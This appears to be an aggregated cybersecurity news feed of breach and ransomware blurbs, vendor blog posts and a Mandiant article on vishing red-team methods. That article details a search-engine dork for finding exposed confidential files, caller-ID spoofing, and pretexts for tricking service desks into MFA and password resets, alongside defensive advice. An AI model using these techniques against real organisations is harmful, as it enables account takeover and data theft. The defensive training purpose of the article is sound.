Announcing Graylog 6.2.3 This is a bug-fix release that improves Graylog’s functionality. Please read on for information on what has changed. Download Links Release date: 2025-06-04 Upgrade notes DEB and RPM packages are available in our repositories Docker Compose Container images: Graylog Open Graylog Enterprise Graylog Data Node Tarballs for manual installation: Graylog Server Graylog […] The post Announcing Graylog 6.2.3 appeared first on Graylog.

At the AI Expo for National Competitiveness, Anne Neuberger told audiences that artificial intelligence tools are an enhancement opportunity for U.S. cyber defenses and intelligence collection.

Announcing Graylog 6.1.12 This is a bug-fix release that improves Graylog’s functionality. Please read on for information on what has changed. Download Links Release date: 2025-06-04 Upgrade notes DEB and RPM packages are available in our repositories Docker Compose Container images: Graylog Open Graylog Enterprise Graylog Data Node Tarballs for manual installation: Graylog Server Graylog […] The post Announcing Graylog 6.1.12 appeared first on Graylog.

Microsoft announced in Berlin today a new European Security Program that promises to bolster cybersecurity for European governments.

In an update to a joint advisory with CISA and the Australian Cyber Security Centre, the FBI said that the Play ransomware gang had breached roughly 900 organizations as of May 2025, three times the number of victims reported in October 2023.

Ukraine’s GUR hacked the Russian aerospace and defense company Tupolev, stealing 4.4GB of highly classified internal data. Ukraine’s military intelligence agency GUR (aka HUR) claims the hack of the Russian aerospace and defense company Tupolev. According to Kyiv Post, Ukraine’s Military Intelligence compromised the United Aircraft Company (UAC) Tupolev division, which is a key developer […]

Literally adding insult to injury Kettering Health patients who had chemotherapy sessions and pre-surgery appointments canceled due to a ransomware attack in May now have to deal with the painful prospect that their personal info may have been leaked online.

This brief outlines the major takeaways from eight expert roundtables on early wealth building policy, hosted by the Aspen Institute Financial Security Program (Aspen FSP) over two weeks in May 2025 under Chatham House Rule. The roundtables featured over 50 experts (not including Aspen FSP staff) from many sectors and fields, including banking, investing, philanthropy, […] The post Lessons from Expert Roundtables on Designing an Effective Early Wealth Building Policy–And Avoiding Costly Pitfalls appeared first on The Aspen Institute.

The Ukrainian police arrested a 35-year-old hacker who breached 5,000 accounts at an international hosting company and used them to mine cryptocurrency, resulting in $4.5 million in damages.

A group that Google is tracking as UNC6040 has been tricking users at many organizations into installing a malicious version of a Salesforce app to gain access and steal data from the platform.

The FBI and Dutch national police were among the law enforcement agencies that took down 145 domains linked to BidenCash, a cybercrime marketplace linked to millions of dollars in fraud since late 2022.

A group of cybercriminals known as Interlock is advertising stolen data from Kettering Health, which includes patients’ data.

#StopRansomware: Play Ransomware

Google Threat Intelligence Group said about 20 organizations have been hit by a cybercrime group it tracks as UNC6040. The post Salesforce customers duped by series of social-engineering attacks appeared first on CyberScoop.

Google Threat Intelligence Group said about 20 organizations have been hit by a cybercrime group it tracks as UNC6040. The post Salesforce customers duped by series of social-engineering attacks appeared first on CyberScoop.

Alleged Sale of an Exploit to Bypass Amazon WAF

Hackers leak data of 88 million AT&T customers with decrypted SSNs; latest breach raises questions about links to earlier Snowflake-related attack.

The transformation of the Biden-era U.S. AI Safety Institute further signals the Trump administration’s innovation-prioritizing approach to AI governance.

Alleged sale of Cisco ISE Pre-auth Remote Code Execution (0day) Exploit

By understanding the neurological realities of human attention, organizations can build more sustainable security operations that protect not only their digital assets but also the well-being of those who defend them.

It’s vital that business leaders keep teams engaged, vigilant and turn people into organizations’ first line of defense this summer.

Software is the engine of innovation, but even the most brilliant ideas can falter without a smooth, efficient development process. That's where developer experience takes center stage. Developer experience is more than just happy developers; it's about empowering them to build extraordinary things. It's about removing roadblocks, fostering collaboration, and providing the tools and environment they need to thrive. Why the developer experience matters more than ever Think of your developers as elite athletes. To perform at their peak, they need the right training, equipment, and support system. A poor developer experience is like forcing them to run a marathon in flip-flops – frustrating, inefficient, and ultimately detrimental to their performance. A superior developer experience , on the other hand, unleashes their full potential. This translates to Faster time to market: Streamlined workflows, automated processes, and collaborative tools accelerate development cycles, enabling you to deliver innovative solutions ahead of the competition. Elevated code quality: Happy, empowered developers write better code. With the right tools and support, they can focus on crafting elegant, robust solutions that delight users and drive business value. Increased developer retention: Top talent is a precious commodity. A positive developer experience  fosters a sense of purpose and satisfaction, making your organization a magnet for the best developers and reducing costly turnover. OpenText: Your partner in developer experience excellence OpenText offers a comprehensive suite of developer experience solutions designed to elevate your developer experience and fuel your software development success. 1. OpenText™ DevOps Cloud: Empower developers in the cloud This cloud-based AI DevOps platform provides a unified environment for development, testing, and deployment, eliminating the friction of juggling disparate tools. Integrated toolchain: Connect all phases of your software delivery lifecycle (SDLC) and consolidate your tools into a single, holistic platform. AI-powered automation: Free your developers from tedious tasks with AI-driven test automation and intelligent assistance. Seamless collaboration: Foster a culture of shared success with integrated tools that break down silos between development, testing, and operations teams. Performance optimization: Equip your developers with performance engineering tools to proactively identify and address bottlenecks, ensuring your applications perform flawlessly under pressure. 2. OpenText™ Functional Testing: Shift-left with confidence Integrate automated testing early in the development cycle and empower developers to catch bugs sooner, reducing costly rework and accelerating delivery. AI-driven testing: Simplify test creation and maintenance with AI-powered tools that learn and adapt to your application. Codeless automation: Make test automation accessible to all developers, regardless of their testing expertise. 3. OpenText™ Performance Engineering: Build for scale and performance Ensure your applications can handle the demands of real-world usage with comprehensive performance testing and analysis tools. Real-world simulation: Simulate user traffic and load conditions to identify performance bottlenecks before they impact your users. Continuous performance feedback: Integrate performance testing into your CI/CD pipeline for continuous feedback and optimization. 4. OpenText™ Software Delivery Management: Orchestrate your development lifecycle Manage your entire software development lifecycle from a single platform, streamlining workflows and fostering collaboration. Agile and DevOps support: Embrace Agile and DevOps methodologies with tools that support iterative development and continuous delivery. End-to-end visibility: Gain complete transparency into your development process, enabling data-driven decisions and continuous improvement. Embrace the future of developer experience with OpenText The future of software development belongs to those who prioritize developer experience. OpenText is your partner in building a developer-centric culture that fosters innovation, accelerates delivery, and drives business success. Ready to unleash the full potential of your development team? Explore OpenText DevOps solutions or contact an OpenText expert today! The post How to not burn out your developers: Optimize the developer experience  appeared first on OpenText Blogs.

An international group of researchers found that simply rerecording deepfake audio with natural acoustics in the background allows it to bypass detection models at a higher-than-expected rate.

The senators advocated for continued federal investment in artificial intelligence research and development, along with nimble regulation and industry collaboration.

Salesforce said that its Agentforce platform “has built-in trust standards and a unified approach.”

Red Canary's monthly roundup of upcoming security conferences and calls for papers (CFP) submission deadlines

Improving job quality doesn’t just benefit workers; it can also strengthen small businesses themselves and the broader communities they serve. Yet, many small business owners lack the resources and knowledge needed to improve the quality of their jobs. The post Upcoming EOP Events Newsletter — June 2025 appeared first on The Aspen Institute.

“One of the biggest vulnerabilities in companies is actually humans,” CrowdStrike co-founder and former CTO Dmitri Alperovitch told TechCrunch in this week’s episode of Equity. “The more you automate, the more opportunities there are for people to find vulnerabilities in your system.” With the $50 billion Chinese AI market potentially slipping out of reach for […]

Moving to cloud-native architecture and modern platforms is allowing enterprises to automate operations and improve security

My colleague Nakkul Khurana and I attended the RSA Conference 2025 (RSAC 2025) to give a talk on the work we completed at Open Text. How to Use LLMs to Augment Threat Alerts with the MITRE Framework was well received with about 200 people attending. The Open Text booth at the Expo showcased all our Cybersecurity products, was also a main attraction for visitors. The event was also packed with insightful sessions covering the latest trends and challenges in cybersecurity. A major focus this year was the intersection of artificial intelligence (AI) and cybersecurity, exploring both the benefits and the risks. This post summarizes some key takeaways from various talks presented at the conference. AI's dual role in cybersecurity Several sessions highlighted AI's evolving role. George Gerchow's talked about "Harnessing AI to Enhance Cloud Security While Addressing New Attack Vectors." He discussed how AI-powered bots like MongoDB's Guardian Bot (GB) are becoming essential for real-time threat response and automating security and compliance tasks. These bots use AI to adapt to emerging threats and improve operational efficiency, reducing response times significantly. However, AI also brings new risks. Michael Bargury's presentation, "Your Copilot Is My Insider," delved into vulnerabilities associated with AI copilots and plugins. He discussed potential data leakage, RAG poisoning, and new attack vectors that arise from the integration of AI into business processes. The key takeaway was that AI can greatly enhance security. However, it also requires careful management and security measures to prevent misuse. The importance of security in RAG systems Akash Mukherjee and Dr. Saurabh Shintre's "RAG-NAROK: What Poorly-Built RAGs Can Do to Data Security" emphasized the security challenges in Retrieval Augmented Generation (RAG) systems. They explained that adding private data to chatbots requires robust access controls and permissions management to prevent data leakage. Akash and Saurabh also discussed different permission enforcement methods along with the need for sensitive data protection beyond just permissions. Security automation with LLM-driven workflows In the session "Fast-Track Security Automation with LLM-Driven Workflows," Steve Povolny explored the application of Large Language Models (LLMs) in automating security operations. He covered various LLM tools, prompt engineering best practices, and real-world use cases for improving Security Operations Center (SOC) efficiency. Steve also highlighted the importance of addressing security considerations like data privacy, prompt injection risks, and model bias. Principles of GenAI security Diana Kelley's talk, "Principles of GenAI Security: Foundations for Building Security In," provided an overview of Generative AI (GenAI) security. She discussed the GenAI threat landscape, architectural considerations, and security at runtime. Key takeaways include the importance of understanding the unique risks associated with AI systems and implementing security-by-design principles. Adversarial neural patterns in LLMs In "Beyond the Black Box Revealing Adversarial Neural Patterns in LLMs," Mark Cherp and Shaked Reiner focused on uncovering hidden vulnerabilities in LLMs. They discussed new jailbreak techniques and mitigations, exploring the "psychology" of models and how they can be manipulated. This talk highlighted the need for continuous research and development of defences against sophisticated AI attacks. Supply chain security and emerging threats Dr. Andrea Little Limbago's presentation, "A Stuxnet Moment for Supply Chain Security?" addressed the emerging threat of supply chain infiltration, referencing recent incidents like the pager attacks. She discussed how digital supply chain attacks are growing and potentially shifting cyber norms. Her talk also emphasized the need for enhanced security measures and vigilance in hardware and software supply chains. The future of security UX with Agentive AI "How Security UX Must Change, with Agentive AI," explored how user experience (UX) in security must adapt with the rise of agentive AI. In this talk Steph Hay emphasized offloading tasks, dynamic UIs, and exponential outcomes. Assistive UX features like "easy buttons," seeded prompts, and multi-turn chats will become crucial for improving security operations. Social engineering and GenAI Perry Carpenter's session, "Conversations with a GenAI-Powered Virtual Kidnapper (and Other Scambots)," examined how social engineering attacks can leverage generative AI. He demonstrated how these tools create realistic scams and highlighted the need for organizations to prepare and train employees to recognize and respond to these threats. Initial access brokers and market trends "Initial Access Brokers: A Deep Dive," provided insights into the world of initial access brokers (IABs). In this talk, Amit Weigman discussed their methods of operation, the types of access they sell, and current market trends. Understanding the IAB ecosystem is crucial for preventing and responding to security breaches. The evolution of the SOC in an AI-driven universe Dave Gold's presentation, "The Future of the SOC in an AI-Driven Universe," revealed the current state of Security Operations Centers (SOCs) and how they will evolve with AI. He highlighted the shift from manual processes to semi-autonomous and autonomous SOCs, the need for scalable AI-driven platforms, and the evolution of SOC visualizations. Safety and security of LLM agents ”Safety and Security of LLM Agents: Challenges and Future Directions," focused on the unique safety and security challenges posed by LLM agents. Dawn Song discussed potential attacks, evaluation methods, risk assessment, and defences for these systems. Ensuring both safety and security is crucial for realizing the benefits of LLM agents. Zero trust AI and multi-agent systems In "Zero Trust AI: Securing Multi-Agent Systems for Private Data Reasoning," Ken Huang addressed the security of multi-agent systems. He introduced the MAESTRO threat modelling approach and emphasized the need for a zero-trust security model in AI systems handling private data. Conclusion RSAC 2025 makes it clear that AI is fundamentally changing the cybersecurity landscape. While it offers tremendous opportunities for enhancing defences, it also introduces new and complex challenges. Organizations must adapt by understanding these changes, adopting AI-driven security solutions, and addressing the associated risks proactively. Staying informed and prepared is key to navigating the future of cybersecurity. Learn how OpenText Core Threat Detection and Response is leveraging AI-driven behavioural analytics to revolutionize SOC teams. The post The future of cybersecurity: Insights from RSAC 2025 appeared first on OpenText Blogs.

Not every incident should be handled alone When a security incident strikes, pressure mounts quickly. Teams feel the urgency to […]

Anticipate, contextualize, and prioritize vulnerabilities to effectively address threats to your organization. The post Flashpoint Weekly Vulnerability Insights and Prioritization Report appeared first on Flashpoint.

The ransomware attack paralyzed newspaper printing and disrupted operations at media outlets across the country for weeks.

Security Advisory Description CVE-2025-1097 (also known as IngressNightmare) A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match- ...

Alleged breach of Hacendado via 0-day in third-party vendor – 27M User Records Exposed

The most commonly exposed device has been discontinued and vulnerable for a decade, new research found.

The most commonly exposed device has been discontinued and vulnerable for a decade, new research found.

Experts argue the case for “communities of support” to boost SMB cyber-resilience

Google has disclosed details of a financially motivated threat cluster that it said "specializes" in voice phishing (aka vishing) campaigns designed to breach organizations' Salesforce instances for large-scale data theft and subsequent extortion. The tech giant's threat intelligence team is tracking the activity under the moniker UNC6040, which it said exhibits characteristics that align with...

Researchers at Google said the current campaign involving versions of the Salesforce Data Loader tool has targeted about 20 organizations and is ongoing.

The Nepal Police, the national law enforcement agency of Nepal, has allegedly become the victim of a significant data breach, with a large cache of sensitive information reportedly being offered for sale online. The Nepal Police, established in 1955, is a crucial institution responsible for maintaining law and order, investigating crimes, managing traffic, and leading […]

Victims include hospitality, retail and education sectors A group of financially motivated cyberscammers who specialize in Scattered-Spider-like fake IT support phone calls managed to trick employees at about 20 organizations into installing a modified version of Salesforce's Data Loader that allows the crims to steal sensitive data.

Malicious RubyGems pose as a legitimate plug-in for the popular Fastlane rapid development platform in a geopolitically motivated attack with global supply chain reach.

Written by: Nick Guttilla Introduction Organizations are increasingly relying on diverse digital communication channels for essential business operations. The way employees interact with colleagues, access corporate resources, and especially, receive information technology (IT) support is often conducted through calls, chat platforms, and other remote technologies. While these various available methods enhance both efficiency and global accessibility, they also introduce an expanded attack surface that can pose a significant risk if overlooked. Prevalence of in-person social interactions has diminished and remote IT structures, such as an outsourced service desk, has normalized employees' engagement with external or less familiar personnel. As a result, threat actors continue to use social engineering tactics. Vishing in the Wild: A Tale of Two Actors Social engineering is the psychological manipulation of people into performing unsolicited actions or divulging confidential information. It is an effective strategy that preys on human emotions and built-in vulnerabilities like trust and the desire to be helpful. Financially motivated threat actors have increasingly adopted voice-based social engineering, or "vishing," as a primary vector for initial access, though their specific methods and end goals can vary significantly. Two prominent examples illustrate the versatility of this threat. The cluster tracked as UNC3944 (which overlaps with "Scattered Spider") has historically used vishing as a flexible entry point for a range of criminal enterprises. Their operators frequently call corporate service desks, impersonating employees to have credentials and multi-factor authentication (MFA) methods reset. This access is then leveraged for broader attacks, including SIM swapping, ransomware deployment, and data theft extortion. More recently, the financially motivated actor UNC6040 has demonstrated a different vishing playbook. Its operators also impersonate IT support, but with the specific goal of deceiving employees into navigating to Salesforce’s connected app page and authorizing a malicious, actor-controlled version of the Data Loader application. This single action grants the actor the ability to perform large-scale data exfiltration from the victim's Salesforce environment, which is then used for subsequent extortion attempts. While both actors rely on vishing, their distinct objectives—UNC3944’s focus on account takeover for broad network access versus UNC6040’s targeted theft of CRM data—highlight the diverse risks organizations face from this tactic. By reviewing the techniques, tactics, and procedures (TTPs) of actors like UNC3944 and UNC6040, organizations can better assess their own internal policies and guidelines when it comes to employee identification and protection of infrastructure and confidential data. Red teamers can also learn from their methodologies to better emulate real-world attacks and assist organizations in developing defense-in-depth strategies. Mandiant has successfully used the following approaches to perform voice-based social engineering during Red Team Assessments for clients of varying sizes. The described techniques have enabled Mandiant to mimic TTPs from sophisticated vishing actors like UNC3944 and UNC6040, resulting in administrative-level user impersonation, corporate network perimeter breaches, and sensitive data access. Mandiant has additionally convinced multiple service desks to reset credentials and alter several forms of MFA. These simulated incidents have empowered organizations to proactively identify and resolve deficiencies that otherwise may have gone unnoticed and potentially exploited by a real threat actor. aside_block ), ('btn_text', 'Listen now'), ('href', 'https://open.spotify.com/episode/33WgtCDvXBHTiagvmWN8Kj'), ('image', None)])]> Open-Source Intelligence Gathering (OSINT) Effective social engineering campaigns are built upon extensive reconnaissance. The amount of information an attacker can source about corporate culture, employees, policies, procedures, and technologies in use directly impacts the maturity of a phishing scenario's development. A thorough search to provide a comprehensive overview of an organization from an outside perspective would include, but is not limited to, discovery of the following items: Network ranges and IP address space Top-level domains and subdomains Cloud service providers and email infrastructure Internet-accessible and internally used web applications Code repositories Corporate phone numbers and email address formats Employee positions and titles Physical office locations Publicly exposed internal documentation Much of this information can often be found through publicly accessible resources. Company websites and marketing materials often list corporate contact information, including numbers for main lines, specific departments, or even individual employees. Social media platforms provide another means of profiling an organization. Professional networking services can be utilized to scrape the full names of employees and recreate corporate emails matching discovered naming conventions. Resumes shared on these platforms may also contain additional contact information including phone numbers and personal email addresses. Attackers may attempt to elicit private information by sending messages to employees from disposable email accounts, aiming to retrieve details through direct interaction or from out-of-office auto-replies. Additionally, public forums, where employees might seek troubleshooting assistance, can inadvertently reveal company-specific details.  Search engines, such as Google, DuckDuckGo, and Bing, provide advanced filtering capabilities to narrow results from targeted queries based on keywords, file types, and other parameters. Figure 1 includes an example of a search filter designed to uncover sensitive files for a given target that may be unknowingly exposed. “TARGET” filetype:pdf | filetype:doc | filetype:docx | filetype:xls | filetype:xlsx | filetype:ppt | filetype:pptx intext:"confidential" | intext:"internal use only" | intext:"not for public release" | intext:"restricted access" Figure 1: Searching for documents with search filters Anonymity networks, like The Onion Router (TOR), can be used to access hidden services, obtain restricted content, and identify supplemental data such as leaked employee IDs, usernames, passwords, and personally identifiable information (PII).   The internet offers a vast array of resources, and a good amount of intelligence can be discovered without any overt interaction with your target. Leveraging Automated Phone Services Some organizations make use of automated phone systems that have pre-recorded messages and interactive menus. These systems can provide callers with business-related information, facilitate employee self-service, or route calls to appropriate departments. If not found online, an attacker may attempt to obtain the phone number for an automated service by contacting an employee, often at a reception desk, claiming to have misplaced the number. Calling into these automated services allows an attacker to anonymously identify common issues faced by end users, names of internal applications, additional phone numbers for specific support teams, and, occasionally, alerts about company-wide technical issues. This type of information can be used to craft pretexts for subsequent activity that involves impersonating IT support.  Discovering Employee Identification Processes Actors engaged in voice-based social engineering ultimately aim to interact with a human operator. While some automated systems provide a direct option to speak with a live agent, others can require some initial information to be provided, such as an employee ID. However, even in these cases, it is common for repeated incorrect entries to result in the transfer to a live agent anyway. Service desk agents handle a high volume of inbound calls ranging from internal employees needing a password reset to external customers experiencing problems with a public-facing application. They are generally given a scripted process for call handling including information they need to request from the caller for identification as well as where to escalate if they are unable to address the issue directly. During the reconnaissance phase in social engineering a service desk, an attacker may feign ignorance or push boundaries of information disclosure before a requirement for identification is enforced. It is also important for an attacker to take note of how service desk personnel react to incorrect or insufficient information being provided. For example, an attacker may provide an employee ID with an incorrect associated name to observe the response, potentially eliciting the correct full name or determining the validity of the employee ID format. Attackers may also call at different times to converse with varying staff members, use different voice modulations to conceal repeated reconnaissance attempts, and iteratively learn more about the service desk's identification process each time. Alternatively, once a service desk number has been identified, an attacker can better target standard employees directly. Using publicly available resources, attackers can spoof the inbound number of a phone call to match that of the legitimate service desk. Without a procedure for verifying inbound callers claiming to be from IT, unsuspecting targets may be convinced by threat actors to perform actions that grant account access or divulge information that can be used to better impersonate staff. Crafting a Convincing Narrative With sufficient reconnaissance data, an attacker can formulate targeted campaigns reflecting plausible employee scenarios. A common pretext for contacting a service desk is a forgotten password. Many organizations verify employees using multiple factors. While initial reconnaissance might provide an attacker with answers for knowledge-based authentication methods, challenges arise if device-based verification is required. An attacker might impersonate an employee who claims their phone is unavailable (e.g., damaged or lost during travel) and who needs urgent account access. Another common practice is for actors to impersonate employees identified as being on personal time off (PTO) via out-of-office replies, leveraging a sense of urgency to persuade service desk personnel. Responses to such situations can vary, especially for executive-level users. In the event of a successful MFA reset, the attacker can then call back and try to get a different agent on the phone to further reset the impersonated user's password for a full account compromise. If the legitimate employee is genuinely unavailable, unauthorized account access can persist for an extended period of time. The Evolution of an Exploit  The compromise of a single account can serve as a foundation for more complex social engineering campaigns. Breaching the perimeter of an organization often grants an attacker access to internal workflows, chats, documents, meeting invites, and ways to better uncover verified intelligence on existing employees. Open-source tools such as ROADrecon can extract details from entire Entra ID tenants, potentially revealing phone numbers, employee IDs, and organizational hierarchy. Attackers may also seek access to IT ticketing systems and support channels to impersonate service desk staff to end-users who have open requests. The more information an attacker possesses, the more believable their pretext becomes, increasing the probability of success. Strategic Recommendations and Best Practices Modern features in mobile technology, such as AI-powered Scam Detection on Android, demonstrate how software may be able to offer personal protection, but a comprehensive defense for organizations against vishing and related social engineering threats requires broad, proactive security initiatives and a defense-in-depth strategy. Mandiant recommends organizations consider the following best practices to reinforce their external perimeter and develop secure communication channels, particularly those involving IT support and employee verification. Positive Identity Verification for Service Desk Interactions Train service desk personnel to rigorously perform positive identity verification for all employees before modifying accounts or providing security-sensitive information (including during initial enrollment). This is critical for any privileged accounts. Mandated verification methods should include options such as: On-camera/video conference verification where the employee presents a corporate badge or government-issued ID Utilization of an internal, up-to-date employee photo database Challenge/response questions based on information not easily discoverable externally (avoiding reliance on publicly available PII like date of birth or the last four digits of a Social Security number, as actors often possess this data) For high-risk changes, such as MFA resets or password changes for privileged accounts, implement out-of-band verification (e.g., a call-back to a registered phone number or confirmation via a known corporate email address of the employee or their manager). During periods of heightened threat or suspected compromise, consider temporarily disabling self-service password or MFA reset methods and routing all such requests through a manual service desk workflow with enhanced scrutiny. Enforce Strong, Phishing-Resistant MFA MFA should be enforced on all sensitive and internet-facing portals to prevent unauthorized access even in the event of a password compromise.  Standardize one primary MFA solution, for most employees, to simplify security architecture and centralize a platform for detections and alerts. Remove weak forms of MFA, such as SMS, voice calls, or simple email links, as primary authentication factors. These are susceptible to vishing, SIM swapping, and other attacks. Prioritize phishing-resistant MFA methods: FIDO2-compliant security keys (hardware tokens), especially for administrative and privileged users Authenticator applications providing number matching or robust geo-verification features Soft-tokens that are not reliant on easily intercepted channels Ensure administrative users cannot register or use legacy/weak MFA methods, even if those are permitted for other user tiers. Secure MFA Registration and Modification Processes Do not permit employees to self-register new MFA devices without stringent controls. Implement an IT-managed or otherwise secure enrollment process. Restrict MFA registration and modification actions to only be permissible from trusted IP locations and/or compliant corporate devices. Alert on and investigate suspicious MFA registration activities, such as the same MFA method or phone number being registered across multiple user accounts. Manager Involvement and Segregation of Duties Service desks should notify managers (via verified contact channels sourced from internal directories) upon an employee's password reset, especially for sensitive accounts. Require manager approval, through a verified channel, for all MFA resets. This creates third-party awareness and an additional record. For larger organizations, consider segregating service desk responsibilities. Customer-facing support desks should generally not have permissions to modify internal corporate employee accounts. Employee Training and Vishing Awareness Conduct regular phishing simulation exercises that include vishing scenarios to educate employees about the specific risks of voice-based social engineering. Train employees to always verify unexpected calls or requests for sensitive information, especially those claiming to be from IT support or other internal departments, by using an official internal directory to initiate a call-back or by contacting their manager. Train employees to recognize common vishing pretexts (e.g., urgent requests to avoid negative consequences, claims of system issues requiring immediate action, unexpected MFA prompts). Equip service desk employees with access to logs of previous calls and tickets to help identify abnormal patterns, such as repeated calls from unrecognized numbers or sequential MFA reset and password reset requests for the same user. Security Monitoring and Alerting for Vishing-Related Activity Utilize security information and event management (SIEM) and security orchestration, automation, and response (SOAR) technologies to monitor employee sign-in activity and service desk interactions. Create specific alerts for the following: Password reset activity, particularly for privileged accounts or outside of expected patterns New MFA device enrollment or modification of existing MFA methods Multiple failed login attempts followed by a successful password or MFA reset MFA fatigue attacks (multiple sequential incomplete authentications) All activities flagged as abnormal should be reviewed by an internal security team and investigated with the impacted employee and their manager. Further guidance on hardening against UNC3944-style threats, including broader identity, endpoint, and network infrastructure recommendations, is detailed by the Google Threat Intelligence Group (GTIG). Conclusion This discussion of voice-based social engineering and its proposed resolutions aims to provide insight into attack methodologies and preventative measures relevant to this threat vector. Organizations seeking direct support on this subject or other services related to attack simulation and red team exercises are encouraged to contact Mandiant for assistance. Mandiant can discuss specific needs in detail and explore tailored recommendations to better equip security postures against advanced and persistent threats.

Credential stuffing is believed to have been behind at least one of the attacks, but both firms say financial data wasn’t accessed

Alleged data breach of Lyca Mobile France – 2.5 Million Customer Records for Sale

The agency has lost roughly 1,000 staffers in the wake of the Trump administration’s workforce cuts, losses that could imperil its ability to protect government computer systems and critical infrastructure.

The agency has lost roughly 1,000 staffers in the wake of the Trump administration’s workforce cuts, losses that could imperil its ability to protect government computer systems and critical infrastructure.

Experts argue that CISOs should avoid product duplication and simplify their language to ensure budget is spent wisely

Ukraine said it hacked into the internal systems of Russia’s state-owned aircraft manufacturer Tupolev, days after a drone offensive destroyed planes made by company.

FedRAMP certification is increasingly central to how technology providers serve the U.S. government. For cloud-based services that manage sensitive data, achieving FedRAMP authorization is not just a regulatory milestone. It is a signal of trust, security, and capability. This is especially true for secure communication platforms like cloud fax solutions, which continue to play a vital role in government workflows. That is why our very own solutions in OpenText™ Core Fax and OpenText™ Fax Cloud Connect are currently on a clear path to achieving FedRAMP authorization in the first half of 2026. This move reflects a strong commitment to deliver secure, compliant, and reliable services to public sector organizations. But what is FedRAMP and why is it important? FedRAMP, the Federal Risk and Authorization Management Program, is a U.S. government wide initiative that standardizes the security assessment, authorization, and continuous monitoring of cloud services. Any cloud provider seeking to work with a federal agency must either be FedRAMP authorized or actively working toward authorization. All U.S. federal agencies are required to use FedRAMP-authorized cloud services, ensuring a unified and risk-conscious approach to cybersecurity across the federal landscape. For OpenText, achieving FedRAMP authorization goes far beyond simply meeting a compliance requirement. The benefits are significant and strategic: 1. Access to the federal marketFedRAMP authorization is a prerequisite for operating within most U.S. government environments, unlocking opportunities in a highly regulated and expansive sector. 2. Stronger competitive positioningAuthorization signals to both public and private sector clients that OpenText meets the highest standards of security and operational maturity. 3. Operational consistencyBy aligning with a single, rigorous framework recognized across multiple federal agencies, FedRAMP streamlines compliance and reduces complexity. 4. Enhanced cybersecurity postureBuilt on NIST 800-53 controls, FedRAMP includes continuous monitoring, incident response, and vulnerability scanning, strengthening the overall security framework. 5. Data protection by designFedRAMP requires robust encryption (at rest and in transit), role-based access controls, and secure auditing core components of a resilient security architecture. 6. Transparency and oversightAuthorized systems undergo regular reviews and are held to evolving standards, providing agencies with confidence in the integrity and accountability of their cloud services. Alignment with state and local frameworks FedRAMP functions as the foundational framework that supports and often supersedes state level risk and authorization programs, including StateRAMP (a national nonprofit initiative for state and local governments) and state specific programs like TX-RAMP (Texas), AZ-RAMP (Arizona), and others. These programs are modeled after or closely aligned with FedRAMP’s robust standards, leveraging the same core principles such as NIST 800-53 controls, standardized assessment methodologies, and continuous monitoring requirements. As a result, cloud service providers that achieve FedRAMP authorization are well-positioned to meet or exceed the requirements of these state programs. This alignment enables a more efficient path to multi-jurisdictional compliance, reduces duplicative assessment efforts, and reinforces FedRAMP's role as the superset framework underpinning cloud security for all levels of government in the U.S. Finally, the result of the FedRAMP process is an "Authority to Operate" (ATO), which is a formal authorization from the government for a CSP to operate and handle sensitive data. While "certification" is often used in the same context as authorization, it can also refer to the process of meeting FedRAMP requirements and preparing for authorization.  OpenText Fax Cloud Connect and Core Fax: Meeting the standards of secure federal communication OpenText is committed to achieving FedRAMP authorization for its digital cloud fax solutions OpenText Fax Cloud Connect and OpenText Core Fax by the first half of 2026. This is not a theoretical goal; meaningful progress is already well underway. OpenText currently operates a FedRAMP-authorized environment that hosts several approved products, and we are actively working to extend this secure platform to include both Core Fax and Fax Cloud Connect. To support this effort, OpenText has established a sovereign U.S. environment for Core Fax, ensuring that all data remains within U.S. jurisdiction fully aligned with FedRAMP’s stringent data residency and sovereignty requirements. Additionally, we are partnering with a certified Third-Party Assessment Organization (3PAO) to perform an independent assessment of both solutions against the FedRAMP authorization requirements. This ensures a transparent, impartial, and rigorous validation of our security posture. Through this approach, OpenText is not just aiming for compliance. We are delivering secure, trustworthy digital fax solutions that federal agencies can adopt with confidence. Why secure cloud faxing still matters - six real use cases Secure faxing may not dominate headlines in the same way cloud collaboration tools do, but it remains a foundational part of critical workflows where legal, personal, or sensitive data must be transmitted reliably and compliantly. Below are six real-world scenarios where FedRAMP compliant faxing plays an essential role: 1. Health record transfers across agencies A Department of Veterans Affairs clinic needs to send medical documentation to a Department of Defense medical center. These transmissions involve protected health information (PHI) and must comply with HIPAA and federal cybersecurity standards. A FedRAMP-authorized fax solution ensures this information is transmitted securely and reliably. 2. Federal contract submissions Government contractors frequently submit sensitive bid documents, acquisition forms, and defense-related materials via fax. This method remains preferred due to its legal enforceability and chain-of-custody features. FedRAMP compliance ensures that transmitted materials are encrypted, traceable, and stored securely. 3. Military procurement and defense logistics Procurement officers within the Department of Defense often need to fax technical specs, procurement requests, or logistics plans to suppliers and internal teams. These documents may contain controlled unclassified information (CUI). A FedRAMP compliant fax system protects the confidentiality and integrity of that data across all endpoints. 4. Emergency response collaboration During national emergencies, agencies like FEMA rely on fax to rapidly exchange signed waivers, resource deployment plans, and public safety documents. With FedRAMP compliant faxing, sensitive materials can be shared confidently, even in chaotic, time-sensitive environments. 5. Higher education loan and grant processing Federal student aid offices and higher education institutions transmit thousands of loan forms, eligibility records, and grant documentation containing personally identifiable information (PII). Secure faxing remains integral to this process. A FedRAMP authorized platform guarantees compliance with federal privacy regulations. 6. Whistleblower and ethics reporting Agencies that receive confidential or anonymous reports, particularly those related to ethics, legal investigations, or internal audits, often use fax due to its traceability and secure delivery. FedRAMP compliance provides the technical assurance needed to protect these communications. Looking ahead Today, our OpenText Core Fax and OpenText Fax Cloud Connect solutions are built for reliability, compliance, and secure document exchange. With our roadmap firmly set toward FedRAMP authorization in 2026, we are taking the necessary steps to support our public sector clients in their mission to operate securely and efficiently. Our sovereign U.S. environment, third-party assessment strategy, and commitment to continuous monitoring place us in a strong position to support some of the most demanding and security conscious organizations in the country. Secure faxing remains a cornerstone of government communication especially when certainty, privacy, and auditability matter most. With FedRAMP authorization on the horizon, OpenText digital fax solutions are poised to deliver that trust at the highest level. The post OpenText digital fax solutions set course for FedRAMP Authority to Operate & Certification in 2026 appeared first on OpenText Blogs.

A threat group is using voice phishing to trick targeted organizations into sharing sensitive credentials.

A threat group is using voice phishing to trick targeted organizations into sharing sensitive credentials.

Hackers are exploiting trusted authentication flows — like Microsoft Teams and IoT logins — to trick users into handing over access tokens, bypassing MFA and slipping undetected into corporate networks.

